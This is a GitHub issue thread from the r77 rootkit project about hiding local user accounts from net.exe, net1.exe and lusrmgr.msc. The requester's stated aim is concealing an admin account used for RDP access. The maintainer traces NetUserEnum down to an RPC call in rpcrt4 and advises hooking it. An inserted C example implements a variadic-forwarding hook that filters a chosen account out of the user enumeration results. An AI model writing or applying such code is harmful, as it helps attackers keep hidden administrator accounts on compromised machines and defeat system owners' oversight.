
Hiding users (net.exe and lusrmgr.msc)

Open MaggieKong opened this issue 10 months ago • 11 comments

Would you add hiding local users from net.exe, net1.exe and lusrmgr.msc in the future?

MaggieKong avatar Mar 26 '24 17:03 MaggieKong

A user leaves lots of traces all over the system, such as its files, an entire registry hive, etc. What's your intention? Why do you consider net.exe to be enough to hide a user's activity? Maybe I can help you better when I understand your intentions a bit better.

bytecode77 avatar Mar 28 '24 12:03 bytecode77

Windows has an RDP service, and control over the RDP service requires an admin user. The most obvious way to list all local users is net.exe, net1.exe and lusrmgr.msc. Hooking NetUserEnum can hide users from the "net.exe user" and "net1.exe user" commands, but it can't hide users from the "net.exe localgroup administrators" command. Hooking the netapi32 API seems to have no effect on lusrmgr.msc.

MaggieKong avatar Mar 28 '24 17:03 MaggieKong

Thanks for doing some research upfront. I've checked what this function is doing. It eventually calls NdrClientCall3, which is an RPC call.

Call stack: netapi32.dll!NetUserEnum calls samcli.dll!NetUserEnum, which calls samlib.dll!SamEnumerateUsersInDomain

This is the call to NdrClientCall3.

    if ( v15 )
    {
      if ( v15 != 1 )
        return 3221225659i64;
      LODWORD(v27) = v11;
      LODWORD(v25) = v12;
      LODWORD(v24) = v31;
      v16.Pointer = NdrClientCall3(
                      (MIDL_STUBLESS_PROXY_INFO *)&pProxyInfo,
                      0x48u,
                      0i64,
                      v28.Simple,
                      a3,
                      v24,
                      v25,
                      &hMem,
                      v27,
                      v14).Pointer;
      v17 = (unsigned int)v16.Pointer;
      v28.Pointer = v16.Pointer;
    }
    else
    {
      LODWORD(v26) = v11;
      LODWORD(v24) = v31;
      v29.Pointer = NdrClientCall3(
                      (MIDL_STUBLESS_PROXY_INFO *)&pProxyInfo,
                      0xDu,
                      0i64,
                      v28.Simple,
                      a3,
                      v24,
                      &hMem,
                      v26,
                      v14).Pointer;
      v17 = (unsigned int)v29.Pointer;
    }

I've only done some quick research and didn't check where this RPC is going. It would be best to hook the function at the remote endpoint (on the local computer, of course). If this is not possible, hooking NdrClientCall3 may do it. I've googled, and this function seems to be a popular target to hook.

I think this function is filling an array with the users. Would you like to hook it and inspect the output?

bytecode77 avatar Mar 28 '24 21:03 bytecode77

Hooking NetUserEnum would do the trick for "net.exe user" or "net1.exe user", but not for the "net.exe localgroup administrators" or "net1.exe localgroup administrators" command. I'm trying NetGroupGetUsers, NetLocalGroupGetMembers and NetQueryDisplayInformation, but no luck.

MaggieKong avatar Mar 29 '24 01:03 MaggieKong

Have you tried hooking NdrClientCall3? I didn't try, but I think it's always called, regardless of which app. You always want to hook the lowest level, not the higher level WinAPI functions.

bytecode77 avatar Mar 29 '24 09:03 bytecode77

I will try

MaggieKong avatar Mar 29 '24 17:03 MaggieKong

There is an issue with hooking NdrClientCall3. The declaration is:

    CLIENT_CALL_RETURN RPC_VAR_ENTRY NdrClientCall3(
        MIDL_STUBLESS_PROXY_INFO *pProxyInfo,
        unsigned long nProcNum,
        void *pReturnValue,
        ...
    );

My hook:

    static CLIENT_CALL_RETURN RPC_VAR_ENTRY HookedNdrClientCall3(MIDL_STUBLESS_PROXY_INFO* pProxyInfo, unsigned long nProcNum, void* pReturnValue, ...)
    {
        va_list args;
        va_start(args, pReturnValue);
        // passes the va_list object itself as the single variadic argument
        CLIENT_CALL_RETURN dwResult = OriginalNdrClientCall3(pProxyInfo, nProcNum, pReturnValue, args);
        va_end(args);

        return dwResult;
    }

Hooking like this, NdrClientCall3 does get triggered, but it results in "The binding handle is invalid" when using the "net.exe user" command. I'm not sure how to call the original API based on that API definition.

MaggieKong avatar Mar 29 '24 18:03 MaggieKong

I've disassembled rpcrt4.dll and found the function definition:

CLIENT_CALL_RETURN NdrClientCall3(MIDL_STUBLESS_PROXY_INFO *pProxyInfo, unsigned int nProcNum, void *pReturnValue, ...)

So first, nProcNum is an int, which is 4 bytes in a 32-bit process and 8 bytes in a 64-bit process. You have a long there, which is always 4 bytes. This might break the following parameters on x64.

I also wondered whether such a low-level function actually uses argument lists, but it does. However, it calls NdrpClientCall3 after doing some parameter checking and converting the argument list to an array. It's worth hooking and looking at calls to this function, I guess.

Just to let you know, it's perfectly normal to spend weeks on figuring out one silly function. I've spent ages on figuring out the NT_NSI_PARAM struct. There is no documentation on that struct other than what I have figured out myself. That's why every single feature of a rootkit takes ages to implement, because 95% of the time I've spent in IDA.

bytecode77 avatar Mar 30 '24 10:03 bytecode77
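An added example (not code from r77 or from either poster) of the forwarding problem discussed above. The posted hook hands the va_list object itself to the original as its first variadic argument, so the callee reads that pointer where it expects the binding handle. A va_list cannot be passed through a "..." parameter at all; the usual workaround is to declare the hook with a fixed number of pointer-sized slots (12 here, an assumption) and forward every slot, which on x64 Windows reproduces the caller's argument slots exactly. The hook then post-processes the output buffer of one proc number to drop a chosen account. rpcrt4 itself, the proc's argument layout, the record type and the account names are stand-ins constructed for this example so it compiles and runs outside Windows; the real SAMR enumeration buffer has a different layout that would have to be confirmed in a debugger before filtering it.

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Minimal stand-ins for the rpcrt4 types, so this compiles without windows.h. */
typedef struct { void *Pointer; } CLIENT_CALL_RETURN_T;
typedef struct { int unused; } MIDL_STUBLESS_PROXY_INFO_T;
typedef CLIENT_CALL_RETURN_T (*NdrClientCall3_t)(MIDL_STUBLESS_PROXY_INFO_T *, unsigned int, void *, ...);

/* Constructed record type; the real SAMR enumeration uses a different structure. */
typedef struct { unsigned long RelativeId; const char *Name; } ENUM_ENTRY;

#define PROC_ENUMERATE 0xDu  /* proc number seen for the enumeration stub in the thread */

/* Constructed sample data returned by the stand-in "server". */
static const ENUM_ENTRY g_sample[] = {
    { 500, "Administrator" }, { 501, "Guest" }, { 1001, "alice" }, { 1002, "svc_hidden" },
};

/* Stand-in for rpcrt4!NdrClientCall3. Constructed argument layout for PROC_ENUMERATE
 * (assumption, not the real SAMR one): slot0 domain handle, slot1 unsigned long* resume
 * handle, slot2 ENUM_ENTRY** out buffer, slot3 unsigned long* out count. */
static CLIENT_CALL_RETURN_T StandInNdrClientCall3(MIDL_STUBLESS_PROXY_INFO_T *pProxyInfo,
                                                  unsigned int nProcNum, void *pReturnValue, ...)
{
    CLIENT_CALL_RETURN_T ret = { (void *)0 };
    (void)pProxyInfo; (void)pReturnValue;
    if (nProcNum != PROC_ENUMERATE) {
        ret.Pointer = (void *)(uintptr_t)0xC0000002; /* STATUS_NOT_IMPLEMENTED */
        return ret;
    }
    va_list ap;
    va_start(ap, pReturnValue);
    (void)va_arg(ap, void *);                           /* slot0: domain handle */
    (void)va_arg(ap, unsigned long *);                  /* slot1: resume handle */
    ENUM_ENTRY **buffer = va_arg(ap, ENUM_ENTRY **);    /* slot2: out buffer */
    unsigned long *count = va_arg(ap, unsigned long *); /* slot3: out count */
    va_end(ap);

    size_t n = sizeof g_sample / sizeof g_sample[0];
    *buffer = malloc(n * sizeof(ENUM_ENTRY));
    if (!*buffer) { ret.Pointer = (void *)(uintptr_t)0xC000009A; return ret; } /* STATUS_INSUFFICIENT_RESOURCES */
    memcpy(*buffer, g_sample, n * sizeof(ENUM_ENTRY));
    *count = (unsigned long)n;
    return ret;
}

/* In a real hook this holds the trampoline to the original; here it is the stand-in. */
static NdrClientCall3_t OriginalNdrClientCall3 = StandInNdrClientCall3;
static const char *g_hiddenName = "svc_hidden"; /* assumption: the account to hide */

/* Drops entries whose name matches `hidden`, compacting in place; returns the new count. */
static unsigned long FilterEntries(ENUM_ENTRY *entries, unsigned long count, const char *hidden)
{
    unsigned long kept = 0;
    for (unsigned long i = 0; i < count; i++)
        if (strcmp(entries[i].Name, hidden) != 0)
            entries[kept++] = entries[i];
    return kept;
}

/* The hook. The variadic tail is declared as fixed pointer-sized slots and every slot is
 * forwarded; on x64 Windows each variadic argument occupies one 8-byte slot, so the original
 * sees the same values the caller passed and ignores the slots it does not need. */
CLIENT_CALL_RETURN_T HookedNdrClientCall3(MIDL_STUBLESS_PROXY_INFO_T *pProxyInfo,
                                          unsigned int nProcNum, void *pReturnValue,
                                          void *a0, void *a1, void *a2, void *a3,
                                          void *a4, void *a5, void *a6, void *a7,
                                          void *a8, void *a9, void *a10, void *a11)
{
    CLIENT_CALL_RETURN_T ret = OriginalNdrClientCall3(pProxyInfo, nProcNum, pReturnValue,
                                                      a0, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11);
    /* Touch the output only on success and only for the proc whose layout is known. */
    if (nProcNum == PROC_ENUMERATE && (uintptr_t)ret.Pointer == 0) {
        ENUM_ENTRY **buffer = (ENUM_ENTRY **)a2;
        unsigned long *count = (unsigned long *)a3;
        if (buffer && *buffer && count)
            *count = FilterEntries(*buffer, *count, g_hiddenName);
    }
    return ret;
}

/* Drives one enumeration through the hook the way a client stub would call it. */
static uintptr_t EnumerateViaHook(ENUM_ENTRY **out, unsigned long *count)
{
    unsigned long resume = 0;
    void *domainHandle = (void *)(uintptr_t)0x1234; /* constructed handle value */
    CLIENT_CALL_RETURN_T r = HookedNdrClientCall3(NULL, PROC_ENUMERATE, NULL,
        domainHandle, &resume, (void *)out, (void *)count,
        NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
    return (uintptr_t)r.Pointer;
}

/* 1 if `name` is still enumerated after hooking, 0 if filtered out, -1 on RPC failure. */
int IsUserVisible(const char *name)
{
    ENUM_ENTRY *buf = NULL; unsigned long n = 0;
    if (EnumerateViaHook(&buf, &n) != 0) return -1;
    int found = 0;
    for (unsigned long i = 0; i < n; i++)
        if (strcmp(buf[i].Name, name) == 0) found = 1;
    free(buf);
    return found;
}

unsigned long CountVisibleUsers(void)
{
    ENUM_ENTRY *buf = NULL; unsigned long n = 0;
    if (EnumerateViaHook(&buf, &n) != 0) return 0;
    free(buf);
    return n;
}

int main(void)
{
    ENUM_ENTRY *buf = NULL; unsigned long n = 0;
    if (EnumerateViaHook(&buf, &n) != 0) return 1;
    for (unsigned long i = 0; i < n; i++)
        printf("%lu  %s\n", buf[i].RelativeId, buf[i].Name);
    free(buf);
    return 0;
}
```

Forwarding slots the caller never passed means the hook reads a few stack words past the real arguments; on x64 Windows those are the caller's own frame, so the reads are harmless, but the hook must never write through them or interpret them for proc numbers it does not recognise. The filtering step also depends on the exact output layout of the proc being hooked, which is why it is gated on one proc number and on a zero status.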

The NdrClientCall3 definition is from rpcndr.h. NdrpClientCall3 is not exported in any DLL. I'm still learning how to use IDA.

MaggieKong avatar Mar 30 '24 18:03 MaggieKong

IDA is a nice thing to learn, if you regularly work with hooks, exploits, etc...

You can hook a function that isn't exported, as long as you know the function pointer. You can get it using GetFunction, which I use to retrieve functions that are not exported, such as in R77_NtCreateThreadEx.

Dunno if NdrpClientCall3 is the relevant function to hook, though.

bytecode77 avatar Mar 31 '24 10:03 bytecode77

Found an issue today. After installing the rootkit, "net.exe localgroup" always returns the error "System error 234 has occurred. More data is available." It occurs on all Windows Server versions, but Windows 10 works fine. BTW, r77 is probably not compatible with Windows Server 2008; once the rootkit is installed, the system acts weird.

MaggieKong avatar Apr 01 '24 01:04 MaggieKong